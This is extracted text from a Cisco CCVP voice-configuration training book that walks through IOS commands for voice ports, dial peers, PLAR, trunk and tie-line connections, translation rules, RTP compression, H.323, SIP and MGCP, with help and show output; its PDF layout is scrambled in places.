Define the input gain for the voice.
Define the input impedance.
Define the output attenuation.
NetworkSims.com
1066
Disable echo cancellation.
Outline
> enable
# config t
(config-voiceport)# impedance 600r
(config-voiceport)# output attenuation 0
Example
> enable
# config t
(config-voiceport)# impedance ?
600r 600 Ohms real
(config-voiceport)# impedance 600r
Router(config-voiceport)# input gain ?
(config-voiceport)# output ?
attenuation Amount of attenuation inserted at transmit side
of the interface
(config-voiceport)# output attenuation ?
<-6 - 14> attenuation in db
(config-voiceport)# output attenuation 0
(config-voiceport)# no ?
battery-reversal
Enable FXO battery-reversal detection
bearer-cap
busyout
comfort-noise
connection
cptone
default
description
dial-type
Configure type of dialer for voice
disc_pi_off
echo-cancel
exit
impedance
input
music-threshold
no
non-linear
NetworkSims.com
1067
output
playout-delay
pre-dial-delay
ring
shutdown
signal
snmp
station-id
supervisory
threshold
timeouts
timing
translate
translation-profile
trunk-group
voice-class

FXO Pre-dial Delay
Number of rings
Configure answer + disconnect supervision options
Translation rule
Translation profile
(config-voiceport)# no echo-cancel ?
coverage
Echo Cancel Coverage
enable
Echo Cancel Enable
suppressor Echo Suppressor
(config-voiceport)# no echo-cancel enable
Cisco CCVP Test 3

Voice Interface Configuration

Outline
This challenge involves the configuration of a dial peer. When is call is initiated the router
must decide where the call is to be routed to. A dial peer is an addressable end point, which
a destination pattern with expicit digits and wildcards to define a single telephone number
or a range of ones. The main dial peers in VoIP are:
POTs dial peers. This connects to a traditional phone network (POTs), such as for PBX
or PSTN. The dial peers have a telephone number and a specific voice port for the edge
device.
VoIP dial peers. This connects to an IP network, and the dial peers have a destination
address, and a next-hop router. Normally it destination is defined as the loopback
address of the remote device.
Objectives
NetworkSims.com
1068
Define a POTs dial peer.

Define a VoIP dial peer.
Outline
> enable
# config t
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
voice 1 pots
destination-pattern 11
port 1/0/0
exit
voice 2 voip
session target ipv4:88.10.11.12
In the first example the phone is on a POTs network, thus when the phone dials Extension
11 it will get sent to Port 1/0/0 (where it should find the remote connection). In the second
example, the phone connects to an IP network thus if it dials Extension 22, it will be directed
to the IP address of 88.10.11.12.
Example
> enable
# config t
cor
hunt
outbound
voice
Voice type
pots
Telephony
vofr
voip
Voice over IP
(config)# dial-p voice 1 pots
answer-address
authentication
SIP Digest Authentication Configuration
call-block
capacity
carrier-id
clid
Caller ID option
corlist
default
description
destination
Outbound dial-peer match config
destination-pattern
NetworkSims.com
1069
digit-strip
direct-inward-dial
dnis-map
exit
fax
forward-digits

Configure fax
dialpeer
group-name
Configure parameter group
huntstop
incoming
information-type
max-conn
to unlimited
no
numbering-type
paramspace
Define parameter space
permission
port
Voice port associated with this peer
preference
prefix
register
gatekeeper
resource
service
The selected service
session
peer
shutdown
supported-language
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
trunkgroup
voice
voice-class
(config-dial-peer)# destination-pattern ?
WORD A sequence of digits - representing the prefix or full telephone number
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port ?
<1-1> Voice interface slot #
(config-dial-peer)# port 1/0/0
(config)# dial-p voice 1 voip
(config-dial-peer)# session ?
protocol
target
(config-dial-peer)# session target ?
(config-dial-peer)# session target ipv4:88.10.11.12

Outline
NetworkSims.com
1070
This challenge involves the configuration of a dial peer for a default destination pattern, and
to define a preference for the dial-peer.
Objectives

Define a default VoIP dial peer.
Define a preference for the dial-peer.
Outline
> enable
# config t
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
(config-dial-peer)#
voice 1 pots
port 1/0/0
exit
voice 3 voip
destination-pattern .T
preference 1
voice 2 voip
preference 2
The .T option matches at least one digit, and is typically used as a default destination
pattern, where it will execute this one if none of the others match. With the preference
command the device will pick the dial-peer with the highest preference.
Example
> enable
# config t
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern .T
(config-dial-peer)# prefe ?
<0-10> Preference order
(config-dial-peer)# preference 1
NetworkSims.com
1071

Outline
This challenge involves the configuration of a PLAR (Private Line, Automated Ringdown)
connection. With PLAR, if a telephone goes off-hook, the router will select a predefined dial
peer to setup a call to a PBX or a destination telephone. The user does not hear a dial tone,
and there is an automated connection. Typically examples of this are in a hotel receiption
where a vistor might pick up the phone and be directed to the telephone in Reception.
Objectives

Define a PLAR connection which will connect a telephone on a certain voice port to a
destination phone, automatically.
Outline
> enable
# config t
(config)# voice 1/0/0
(config-voiceport)# connection plar 22
In this example when the telephone connected to voice port 1/0/0 is picked-up, this router
(Remote Router) will automatically generate the digits for 22 for a dial peer lookup. It will
then match these digits to the Dial-peer number 2, and send the call automatically to a
destination of 88.10.11.12 (the loopback address of the Central Router), where the device
there will send it to the correct voice port:
| Remote |
| Central
|
Telephone --Voice1/0/0-| Router |------| Router
|--- Telephone
(Ext. 11)
|10.0.0.1|
| 88.10.11.12 |
(Ext. 22)
Thus the user will connect automatically to a certain telephone.

Example
NetworkSims.com
1072
> enable
# config t
(config-voiceport)# connection ?
plar
Private Line Auto Ringdown
tie-line A tie line
trunk
A Straight Tie Line
(config-voiceport)# connection plar ?
WORD A string of digits including wild cards
tied dedicated tie to this number
(config-voiceport)# connection plar 22

Outline
This challenge involves the configuration of a trunk route. A trunk route will remain
permanent, even in the absence of any calls. The ports on either side will thus be
permanentally allocated to the trunk route. A trunk line is a little like a hot-line which is
permanenty connected, no matter what. There is no dialing involved, at all.
Objectives
Define a trunk connection.
Outline
> enable
# config t
(config-voiceport)# connection trunk 22
NetworkSims.com
1073
In this example there will be a direct connection from the phone connected to the
destionation, which makes a connection back through dial-peer 1:
| Remote |
| Central
|
|--- Telephone
(Ext. 11)
|10.0.0.1|
| 88.10.11.12 |
(Ext. 22)
In this example, both dial-peers are required, one for the outbound connection (dial-peer 2),
and the other to map the connection back to the same port (dial-peer 1).
In this case the dial-peer on the other side (Central Router) will be:
> enable
# config t
Example
> enable
# config t
(config-voiceport)# connection ?
plar
Private Line Auto Ringdown
tie-line A tie line
trunk
A Straight Tie Line
(config-voiceport)# connection trunk ?
WORD A string of digits including wild cards
(config-voiceport)# conn tr 22 ?
answer-mode Slave mode trunking
retry-timer timer value for retry connetion
<cr>

NetworkSims.com
1074
Outline
This challenge involves the configuration of a tie-line route. A tie-line are often used to
assign a decided circuit between two PBXs. With this there will be an IP network in-between
the PBX connections, thus two remote sites with PBXs can be connected via a tie-line over an
IP network.
Objectives
Define a tie-line connection.
Outline
> enable
# config t
(config-voiceport)# connection tie-line 22
(config-dial-peer)# destination-pattern 11..
With tie-line there is a direct connection from the two telephone connections. Any phone
from the 11.. extension, will be able to connect direct to a phone on the 22.. telephone
system.
| Remote |
| Central
|
|--- Telephone
(Ext. 11..)
|10.0.0.1|
| 88.10.11.12 |
(Ext. 22..)
For example, if a user phones Ext 2211 from the 11... network, the call will be routed to the
22.. network, and the same goes for the 22.. network, where a call to the 11.. network will be
routed to the 11.. telephone network. In this case the dial-peer on the other side (Central
Router) will be:
> enable
# config t
NetworkSims.com
1075
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
port 1/0/0
exit
voice 2 voip
destination-pattern 11..
Example
> enable
# config t

Outline
This challenge involves the of a translation-rule which is a regular expression format of the
dial pattern.
Objectives
Define a translation-rule.
Apply translation-rule.
Outline
> enable
# config t
(config)# voice translation-rule 111
(cfg-translation-rule)# rule 1 /^666/ /444\1/
(cfg-translation-rule)# exit
(config)# dial-peer 10 pots
(config-dial-peer)# translate-outgoing called 111
(config-dial-peer)# forward-digits all
(config)# voice translation-profile 111
Outline
NetworkSims.com
1076
> enable
# config t
(config)# voice ?
call
Voice call related configuration.
cause-code
Sets the internal Q850 cause code mapping
class
Control parameters class
disc-pi-incoming-on disconn with PI from incoming leg is maintained
dnis-map
Create or add to a dnis-map
dsp
DSP functions
enum-match-table
enum match table entry
hpi
Host port interface
hunt
Dialpeer hunt conditions.
iec
Configure Internal Error Code behavior
register
voice register commands
rtp
enable to open RTP in both directions.
service
Global packet telephony service commands
source-group
Source Group configuration commands
statistics
Voice Statistics
translation-profile Translation profile configuration commands
translation-rule
Translation Rule configuration commands
vad-time
Voice activity detection hangover period
(config)# voice translation-rule ?
<1-2147483647> Translation rule tag
(config)# voice translation-rule 111
(cfg-translation-rule)# ?
Translation rule configuration commands:
exit
Exit from Translation rule configuration mode
help
no
rule
Translation rule
(cfg-translation-rule)# rule ?
<1-15> Translation rule tag
(cfg-translation-rule)# rule 1 ?
/WORD/ Matching pattern
reject Call block rule
(cfg-translation-rule)# rule 1 /^666/ ?
/WORD/ Replacement pattern
(cfg-translation-rule)# rule 1 /^666/ /444\1/ ?
plan Match and replace the number plan
type Match and replace the number type
<cr>
(cfg-translation-rule)# rule 1 /^666/ /444\1/
(cfg-translation-rule)# exit
answer-address
authentication
SIP Digest Authentication Configuration
call-block
capacity
carrier-id
clid
Caller ID option
corlist
default
description
destination
Outbound dial-peer match config
destination-pattern
NetworkSims.com
1077
digit-strip
direct-inward-dial
dnis-map
exit
fax
forward-digits

Configure fax
dialpeer
group-name
Configure parameter group
huntstop
incoming
information-type
max-conn
to unlimited
no
numbering-type
paramspace
Define parameter space
permission
port
Voice port associated with this peer
preference
prefix
register
gatekeeper
resource
service
The selected service
session
peer
shutdown
supported-language
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
trunkgroup
voice
voice-class
(config-dial-peer)# translate-outgoing ?
called
called party number will required translate
calling calling party number will required translate
(config-dial-peer)# translate-outgoing ?
incoming Translation Profile for incoming call leg
outgoing Translation Profile for outgoing call leg
(config-dial-peer)# translate-outgoing called 111
(config-dial-peer)# forward-digits ?
<0-32> number of right-justified dialed digits to be forwarded
all
forward all destination digits
extra
extra dialed digits to be forwarded
(config-dial-peer)# forward-digits all
(config)# voice translation-profile ?
WORD Translation profile name
(config)# voice translation-profile 111
(cfg-translation-profile)# ?
Translation Profile configuration commands:
default
exit
Exit from translation profile configuration mode
help
no
NetworkSims.com
1078
translate
Specify numbers that should be translated
Cisco CCVP Test 4

Voice Dial Peer Configuration

Outline
This challenge involves compression the RTP header for a serial interface.
Mechanisms
Objectives
Define RTP header compression.
Example
> en
# config t
(config)# int e0
(config-if)# ip ?
access-group
accounting
address
audit
auth-proxy
authentication
bandwidth-percent
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
flow
NetworkSims.com
1079
hello-interval
helper-address
hold-time
idle-group
igmp
information-reply
inspect
Apply inspect name
irdp
load-sharing
local-proxy-arp
mask-reply
mobile
Mobile IP support
mrm
mroute-cache
mtu
multicast
nat
nbar
next-hop-self
nhrp
ospf
pgm
pim
policy
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
router
rsvp
rtp
RTP parameters
sap
security
split-horizon
summary-address
tcp
unnumbered
unreachables
urd
verify
vrf
wccp
(config-if)# ip rtp ?
header-compression
Enable RTP header compression
priority
reserve
Assign a reserved queue for RTP streams
(config-if)# ip rtp header-compression
(config-if)# ip rtp compression-connections ?
(config-if)# ip rtp compression-connections 20

Outline
NetworkSims.com
1080
This challenge involves compression the RTP header for a frame relay connection.
Mechanisms
Objectives
Define RTP header compression for a frame-relay connection.
Example
> en
# config t
(config)# int s0
(config-if)# encapsulate ?
atm-dxi
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
(config-if)# encapsulate frame-relay
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000
NetworkSims.com
1081
1300000
2000000
4000000
8000000
<300-4000000>
accounting
address-reg
broadcast-queue
class
de-group
fragment
fragmentation
ifmib-counter64
interface-dlci
interface-queue
intf-type
inverse-arp
ip
lmi-n391dte
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
policing
priority-dlci-group
qos-autosense
route
traffic-shaping
traps-maximum
bridge Bridging
bstun
Block Serial Tunnel
dlsw
ip
IP
ipv6
IPV6
llc2
llc2
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
stun
Serial Tunnel
<16-1007> DLCI
broadcast
cisco
compress
NetworkSims.com
1082
ietf
nocompress
payload-compression
rtp
tcp
<cr>

Use payload compression
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast ?

cisco
compress
ietf
nocompress
rtp
tcp
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp ?
header-compression Enable RTP/IP compression
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp header-compression ?
active
Always compress RTP headers
connections Maximum number of compressed RTP connections
passive
Compress for destinations sending compressed RTP headers
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 b r header-compression
Cisco CCVP Test 5

VoIP Fundamentals

Outline
This challenge involves the configuration of an H.323 gateway.
Objectives
Define H.323
Outline
NetworkSims.com
1083
> enable
# config t
(config)# int e0
(config-if)# h323-gateway voip interface
(config-if)# h323-gateway voip h323-id gw_1
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718
(config-if)# h323-gateway voip bind srcaddr 1.2.3.4
(config-if)# h323- gateway voip tech-prefix 1#
(config-if)# exit
(config-dial-peer)# session target ras
(config-dial-peer)# no register e164
(config)# gateway
Where gk.test.com is the Gatekeeper name.

1.2.3.5 is the IP address to bind with, and 1718 is the port.
Example
> enable
# config t
(config)# int e0
(config-if)# h323-gateway ?
voip Configure H323 Gateway Voip Interface
(config-if)# h323-gateway voip ?
bind
Configure Bind IP Address
h323-id
Specify an H.323 ID for this interface
id
Gatekeeper identifier
interface
Configure H323 Gateway Voip Interface
tech-prefix Specify a technology prefix
(config-if)# h323-gateway voip interface
(config-if)# h323-gateway voip h323-id ?
WORD Specify the h323 id
(config-if)# h323-gateway voip h323-id gw_1
(config-if)# h323-gateway voip id ?
WORD An ASCII string up to 128 bytes
(config-if)# h323-gateway voip id gk.testing.com ?
ipaddr
IP address of the gatekeeper this gateway wants to register with
multicast Use multicast discovery to register the gateway with a gatekeeper
(config-if)# h323-gateway voip id gk.testing.com ipaddr ?
A.B.C.D An IP address
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.4 ?
<cr>
(config-if)# h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718
(config-if)# h323- v b ?
srcaddr IP address of this interface that will be used as source addr
NetworkSims.com
1084
(config-if)# h323-gateway voip bind srcaddr ?

A.B.C.D An IP address
(config-if)# h323-gateway voip bind srcaddr 1.2.3.4
(config-if)# h323-gateway voip tech-prefix ?
WORD A technology prefix that the interface will register with the
gatekeeper
(config-if)# h323-gateway voip tech-prefix #1
(config-dial-peer)# session target ras
(config-dial-peer)# no register e164
(config)# gateway
The main commands:
h323-gateway voip interface. This enables the router interface for H.323 processing.
h323-gateway voip h323-id gw_1. This defines the H323 ID for the router.
h323-gateway voip id gk.testing.com ipaddr 1.2.3.5 1718. This defines the ID of the
gatekeeper for its IP address and TCP port number.
And the optional ones are:
h323- voip tech-prefix 10#. This registers a technology prefix which tells the gateway
that this gateway can handle 1# destinations (see explanation below)
h323- voip bind srcaddr 1.2.3.4. This defines the source address for H.323 packets
(1.2.3.4).
With no register e164, the router, when communicating with the gateway, does not register
the destination pattern and thus defines that it must use an alternative method for gaining
it.
For a technology-prefix, the administrator defines different classes of gateway, such as:
1# - voice gateway.
2# - voicemail gateway.
3# H.320 gateway.
And so on.
The tech-pref is then added to the number that is required, so that it reaches the right
gateway. For example a caller might use 1#1112222 for a telephone at 1112222 for a voice
gateway. On receiving this, the voice gateway will strip-off the tech-prefix, and sends it to
the telephone at 1112222.
NetworkSims.com
1085

Outline
This challenge involves the configuration of SIP
Objectives
Enable SIP, and optional parameters.

Define a dial-peer for SIP Version 2.
Outline
> enable
# config t
(config)# sip-ua
(config-sip-ua)# retry invite 10
(config-sip-ua)# retry response 10
(config-sip-ua)# retry cancel 10
(config-sip-ua)# retry bye 10
(config-sip-ua)# sip-server dns:test
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session target sip-server
(config)# exit
# sh sip-ua status
# sh sip-ua timers
Example
> enable
# config t
(config)# sip-ua
(config-sip-ua)# ?
aaa
authentication
calling-info
default
exit
max-forwards
mwi-server
NetworkSims.com
1086
nat

SIP User Agent
no
notify
offer
reason-header
redirection
registrar
remote-party-id
retry
set
sip-server
srv
DNS SRV Query Type
suspend-resume
timers
transport
(config-sip-ua)# retry ?
bye
BYE retry value
cancel
CANCEL retry value
comet
COMET retry value
info
INFO retry value
invite
INVITE retry value
notify
NOTIFY retry value
prack
PRACK retry value
refer
REFER retry value
register
REGISTER retry value
(config-sip-ua)# retry invite 10
(config-sip-ua)# retry response 10
(config-sip-ua)# retry cancel 10
(config-sip-ua)# retry bye 10
(config-sip-ua)# sip-server dns:test
protocol
target
(config-dial-peer)# session protocol ?
cisco
Cisco Session Protocol
multicast Multicast Session Protocol(voice conferencing)
sipv2
IETF Session Inititation Protocol
(config-dial-peer)# session target sip-server
(config)# exit
# sh sip-ua timers
SIP UA Timer Values (millisecs unless noted)
trying 10000, expires 180000, connect 10000, disconnect 500
comet 500, prack 500, rel1xx 500, notify 500
refer 500, register 500, info 500, hold 2880 minutes, aging 5 minutes
# sh sip-ua status
SIP User Agent Status
NetworkSims.com
1087
SIP User Agent for UDP : ENABLED

SIP User Agent for TCP : ENABLED
SIP User Agent bind status(signaling): DISABLED
SIP User Agent bind status(media): DISABLED
SIP early-media for 180 responses with SDP: ENABLED
SIP max-forwards : 70
SIP DNS SRV version: 2 (rfc 2782)
NAT Settings for the SIP-UA
Role in SDP: NONE
Check media source packets: DISABLED
Maximum duration for a telephone-event in NOTIFYs: 2000 ms
SIP support for ISDN SUSPEND/RESUME: ENABLED
Redirection (3xx) message handling: ENABLED
Reason Header will override Response/Request Codes: DISABLED
SDP application configuration:
Version line (v=) required
Owner line (o=) required
Timespec line (t=) required
Media supported: audio image
Network types supported: IN
Address types supported: IP4
Transport types supported: RTP/AVP udptl

Outline
This challenge involves the configuration of an MGCP Residential Gateway.
Objectives
Enable Call Manager Application MGCP.

Define the MGCP call-agent.
Enable MGCP.
Outline
> enable
# config t
(config)# ccm-manager mgcp
(config)# mgcp
(config)# mgcp call-agent 192.168.0.1
(config-dial-peer)# application mgcpapp
(config-dial-peer)# voice 1/0/0
(config-dial-peer)# voice 1/0/1
NetworkSims.com
1088
(config)# exit
# show mgcp statistics
# show call application voice summary
# show mgcp
# show call active voice brief
# show call history voice
Example
> enable
# config t
(config)# ccm ?
application
config
download-tones
fallback-mgcp
fax
mgcp
music-on-hold
redundant-host
sccp
shut-backhaul-interfaces
switchback
application specific
MGCP download configuration
Enable Tone Download from TFTP server
Enable Fallback from MGCP to H.323 mode if no Call
Manager is available
Enable fax protocol for MGCP
Enable Call Manager Application MGCP mode
Enable multicast Music-on-hold
Redundant host list
Enable Call Manager Application SCCP mode
Shutdown the backhauled interfaces if no Call
Configure switchback options for rehoming to
higher-order Call Manager

(config)# mgcp ?
<1025-65535>
Enable MGCP with user specified UDP port number
behavior
Set MGCP message behavior
bind
MGCP bind command
block-newcalls
Take down active connections in an orderly way
call-agent
Specify address of call-agent
codec
The codec rate to be attempted for MGCP controlled
connections
default-package
Select the Default Package Capability to be supported by
MGCP
dtmf-relay
configure mgcp dtmf-relay
endpoint
Configure endpoint handling
explicit
MGCP Level to disable/enable explicit detections
fax
Configure MGCP Fax Parameters
ip
Configure IP parameters for MGCP-controlled connections
max-waiting-delay
Specify Maximum Waiting Delay(MWD), prevents restart
avalanches
modem
Configure MGCP Modem Parameters
package-capability
Select the Package Capabilities to be supported by MGCP
persistent
Configure persistents events handling
piggyback
Configure piggyback message
playout
The jitter buffer packet size attempted for MGCP
controlled connections
profile
MGCP profile configuration mode
quality-threshold
Specify voice quality related threshold values
quarantine
Configuration for event quarantine buffer handling
request
Configuration for MGCP requests sent by this gateway
restart-delay
Specify the Restart Delay timer value
rtp
configuration for MGCP rtp timer
rtrcac
Enable rtr-based VoIP CAC for MGCP
sched-time
Specify the Scheduler timer value
sdp
Specify SDP operation for MGCP
sgcp
Configuration for SGCP running in MGCP stack
src-cac
Enable system resource check CAC for MGCP
NetworkSims.com
1089
timer
vad
validate
voice-quality-stats
<cr>
configure MGCP timers

Enable VoiceActivityDetection(Silence Suppression) for
MGCP
Validation of MGCP messaging
Enable Voice Quality related stats reporting for MGCP
(config)# mgcp
(config)# mgcp call-agent ?
WORD Hostname or IP address of the call-agent
(config-dial-peer)# ap ?
WORD Application name (Use show call application voice summary for list)
(config-dial-peer)#
(config-dial-peer)#
(config)# dial-peer
(config-dial-peer)#
(config-dial-peer)#
application mgcpapp
voice 1/0/0
voice 2 pots
application mgcpapp
voice 1/0/1
# show mgcp statistics

UDP pkts rx 0, tx 0
Unrecognized rx pkts 0, MGCP message parsing errors 0
Duplicate MGCP ack tx 0, Invalid versions count 0
CreateConn rx 0, successful 0, failed 0
DeleteConn rx 0, successful 0, failed 0
ModifyConn rx 0, successful 0, failed 0
DeleteConn tx 0, successful 0, failed 0
NotifyRequest rx 0, successful 0, failed 0
AuditConnection rx 0, successful 0, failed 0
AuditEndpoint rx 0, successful 0, failed 0
RestartInProgress tx 0, successful 0, failed 0
Notify tx 0, successful 0, failed 0
ACK tx 0, NACK tx 0
ACK rx 0, NACK rx 0
IP address based Call Agents statistics:
No Call Agent message.
System resource check is DISABLED. No available statistic
DS0 Resource Statistics
----------------------Utilization: 0.00 percent
Total channels: 0
Addressable channels: 0
Inuse channels: 0
Disabled channels: 0
Free channels: 0
# show call application voice summary
SERVICES (standalone applications):
name
type
ipsla-responder
Tcl Script
clid_authen
Tcl Script
clid_col_npw_npw
Tcl Script
DEFAULT
C Script
CTAPP
C Script
fax_hop_on
Tcl Script
NetworkSims.com
description
builtin:app_test_rcvr_script.tcl
builtin:app_clid_authen_script.tcl
builtin:app_clid_col_npw_npw_script.tcl
builtin:Session_Service.C
builtin:CallTreatment_Service.C
builtin:app_fax_hop_on_script.tcl
1090
ipsla-testcall
clid_authen_npw
session
clid_col_npw_3
lib_off_app
stcapp
MGCPAPP
Tcl Script
Tcl Script
Tcl Script
Tcl Script
CCAPI
CCAPI
CCAPI
builtin:app_test_place_script.tcl
builtin:app_clid_authen_npw_script.tcl
builtin:app_session_script.tcl
builtin:app_clid_col_npw_3_script.tcl
Libretto Offramp
SCCP Call Control Application
MGCP Application
# show mgcp
MGCP Admin State DOWN, Oper State DOWN - Cause Code NONE
MGCP call-agent: none Initial protocol service is MGCP 0.1
MGCP block-newcalls DISABLED
MGCP validate domain name DISABLED
MGCP send SGCP RSIP: forced/restart/graceful/disconnected DISABLED
MGCP quarantine mode discard/step
MGCP quarantine of persistent events is ENABLED
MGCP dtmf-relay for VoIP disabled for all codec types
MGCP dtmf-relay for VoAAL2 disabled for all codec types
MGCP voip modem passthrough disabled
MGCP voaal2 modem passthrough disabled
MGCP voip modem relay: Disabled.
MGCP TSE payload: 100
MGCP T.38 Named Signalling Event (NSE) response timer: 200
MGCP Network (IP/AAL2) Continuity Test timer: 200
MGCP 'RTP stream loss' timer: 5
MGCP request timeout 500
MGCP maximum exponential request timeout 4000
MGCP gateway port: 2427, MGCP maximum waiting delay 3000
MGCP restart delay 0, MGCP vad DISABLED
MGCP rtrcac DISABLED
MGCP system resource check DISABLED
MGCP xpc-codec: DISABLED, MGCP persistent hookflash: DISABLED
MGCP persistent offhook: ENABLED, MGCP persistent onhook: DISABLED
MGCP piggyback msg ENABLED, MGCP endpoint offset DISABLED
MGCP simple-sdp DISABLED
MGCP undotted-notation DISABLED
MGCP codec type g711ulaw, MGCP packetization period 20
MGCP JB threshold lwm 30, MGCP JB threshold hwm 150
MGCP LAT threshold lwm 150, MGCP LAT threshold hwm 300
MGCP PL threshold lwm 1000, MGCP PL threshold hwm 10000
MGCP CL threshold lwm 1000, MGCP CL threshold hwm 10000
MGCP playout mode is adaptive 60, 40, 200 in msec
MGCP Fax Playout Buffer is 300 in msec
MGCP media (RTP) dscp: ef, MGCP signaling dscp: af31
MGCP default package: line-package
MGCP supported packages: gm-package dtmf-package trunk-package line-package
hs-package atm-package ms-package dt-package res-package
mt-package fxr-package
MGCP Digit Map matching order: shortest match
SGCP Digit Map matching order: always left-to-right
MGCP VoAAL2 ignore-lco-codec DISABLED
MGCP T.38 Fax is ENABLED
MGCP T.38 Fax ECM is ENABLED
MGCP T.38 Fax NSF Override is DISABLED
MGCP T.38 Fax Low Speed Redundancy: 0MGCP T.38 Fax High Speed Redundancy: 0
MGCP control bind :DISABLED
MGCP media bind :DISABLED
MGCP Upspeed payload type for G711ulaw: 0, G711alaw: 8
MGCP Dynamic payload type for G.726-16K codec
MGCP Dynamic payload type for G.726-24K codec
MGCP Dynamic payload type for G.Clear codec
MGCP Guaranteed scheduler time is disabled
NetworkSims.com
1091
# show call active voice brief

<ID>:<start>hs.<index> +<connect> pid:<peer_id> <dir> <addr> <state>
dur hh:mm:ss tx:<packets>/<bytes> rx:<packets>/<bytes>
IP <ip>:<udp> rtt:<time>ms pl:<play>/<gap>ms lost:<lost>/<early>/<late>
delay:<last>/<min>/<max>ms <codec>
MODEMPASS <method> buf:<fills>/<drains> loss <overall%>
<multipkt>/<corrected>
last <buf event time>s dur:<Min>/<Max>s
FR <protocol> [int dlci cid] vad:<y/n> dtmf:<y/n> seq:<y/n>
sig:<on/off> <codec> (payload size)
ATM <protocol> [int vpi/vci cid] vad:<y/n> dtmf:<y/n> seq:<y/n>
sig:<on/off> <codec> (payload size)
Tele <int>:tx:<tot>/<v>/<fax>ms <codec> noise:<l> acom:<l> i/o:<l>/<l>
dBm
MODEMRELAY info:<rcvd>/<sent>/<resent> xid:<rcvd>/<sent>
total:<rcvd>/<sent>/<drops>
Proxy <ip>:<audio udp>,<video udp>,<tcp0>,<tcp1>,<tcp2>,<tcp3> endpt:
<type>/<manf>
bw:<req>/<act> codec:<audio>/<video>
tx:<audio pkts>/<audio bytes>,<video pkts>/<video bytes>,<t120
pkts>/<t120 bytes>
rx:<audio pkts>/<audio bytes>,<video pkts>/<video bytes>,<t120
pkts>/<t120 bytes>
Total call-legs:2
1269 :7587246hs.1 +260 pid:0 Answer active
dur 00:07:14 tx:590/11550 rx:21721/434420
IP 172.29.248.111:17394 rtt:3ms pl:431850/0ms lost:0/0/0 dela
y:69/69/70ms g729r8
1269 :7587246hs.2 +259 pid:133001 Originate 133001 active
dur 00:07:14 tx:21717/434340 rx:590/11550
Tele 1/0:1 (2):tx:434350/11640/0ms g729r8 noise:-44 acom:-19
i/0:-45/-45 dBm
# show call history voice
GENERIC:
SetupTime=104648 ms
Index=1
PeerAddress=55240
PeerSubAddress=
PeerId=2
PeerIfIndex=105
LogicalIfIndex=0
DisconnectCause=10
DisconnectText=normal call clearing.
ConnectTime=104964
DisconectTime=143329
CallDuration=00:06:23
CallOrigin=1
ChargedUnits=0
InfoType=speech
TransmitPackets=37668
TransmitBytes=6157536
ReceivePackets=37717
ReceiveBytes=6158452
VOIP:
ConnectionId[0x4B091A27 0x3EDD0003 0x0 0xFEFD4]
RemoteIPAddress=1.14.82.14
RemoteUDPPort=18202
RoundTripDelay=2 ms
SelectedQoS=best-effort
tx_DtmfRelay=inband-voice
NetworkSims.com
1092
FastConnect=TRUE
SessionProtocol=cisco
SessionTarget=ipv4:1.14.82.14
OnTimeRvPlayout=40
GapFillWithSilence=0 ms
GapFillWithPrediction=0 ms
GapFillWithInterpolation=0 ms
GapFillWithRedundancy=0 ms
HiWaterPlayoutDelay=67 ms
LoWaterPlayoutDelay=67 ms
ReceiveDelay=67 ms
LostPackets=0 ms
EarlyPackets=0 ms
LatePackets=0 ms
VAD = enabled
CoderTypeRate=g729r8
CodecBytes=20
cvVoIPCallHistoryIcpif=0
SignalingType=cas
Modem passthrough signaling method is nse
Buffer Fill Events = 0
Buffer Drain Events = 0
Percent Packet Loss = 0
Consecutive-packets-lost Events = 0
Corrected packet-loss Events = 0
Last Buffer Drain/Fill Event = 373sec
Time between Buffer Drain/Fills = Min 0sec Max 0sec
GENERIC:
SetupTime=104443 ms
Index=2
PeerAddress=50110
PeerSubAddress=
PeerId=100
PeerIfIndex=104
LogicalIfIndex=10
DisconnectCause=10
DisconnectText=normal call clearing.
ConnectTime=104964
DisconectTime=143330
CallDuration=00:06:23
CallOrigin=2
ChargedUnits=0
InfoType=speech
TransmitPackets=37717
TransmitBytes=5706436
ReceivePackets=37668
ReceiveBytes=6609552
TELE:
ConnectionId=[0x4B091A27 0x3EDD0003 0x0 0xFEFD4]
TxDuration=375300 ms
VoiceTxDuration=375300 ms
FaxTxDuration=0 ms
CoderTypeRate=g711ulaw
NoiseLevel=-75
ACOMLevel=11
SessionTarget=
ImgPages=0

NetworkSims.com
1093
Outline
This challenge involves the configuration of SIP with a Cisco SIP Gateway FXO setup. Some
routers have Foreign Exchange Station (FXS) interfaces which can connect to a standard
telephone, fax machine, or similar device and thus must provide ringing, voltage supplies,
and a dial tone. Normally the FXS interface uses an RJ-11 connector to connect to telephone
equipment.
Objectives
Define SIP details.

Define the voice port settings
Outline
> enable
# sh version
# config t
(config)# sip-au
(config-sip-ua)# ?
(config)# gateway
Example
> enable
# sh version
SOFTWARE (fc1)
Version
12.4(12),
NetworkSims.com
1094
RELEASE

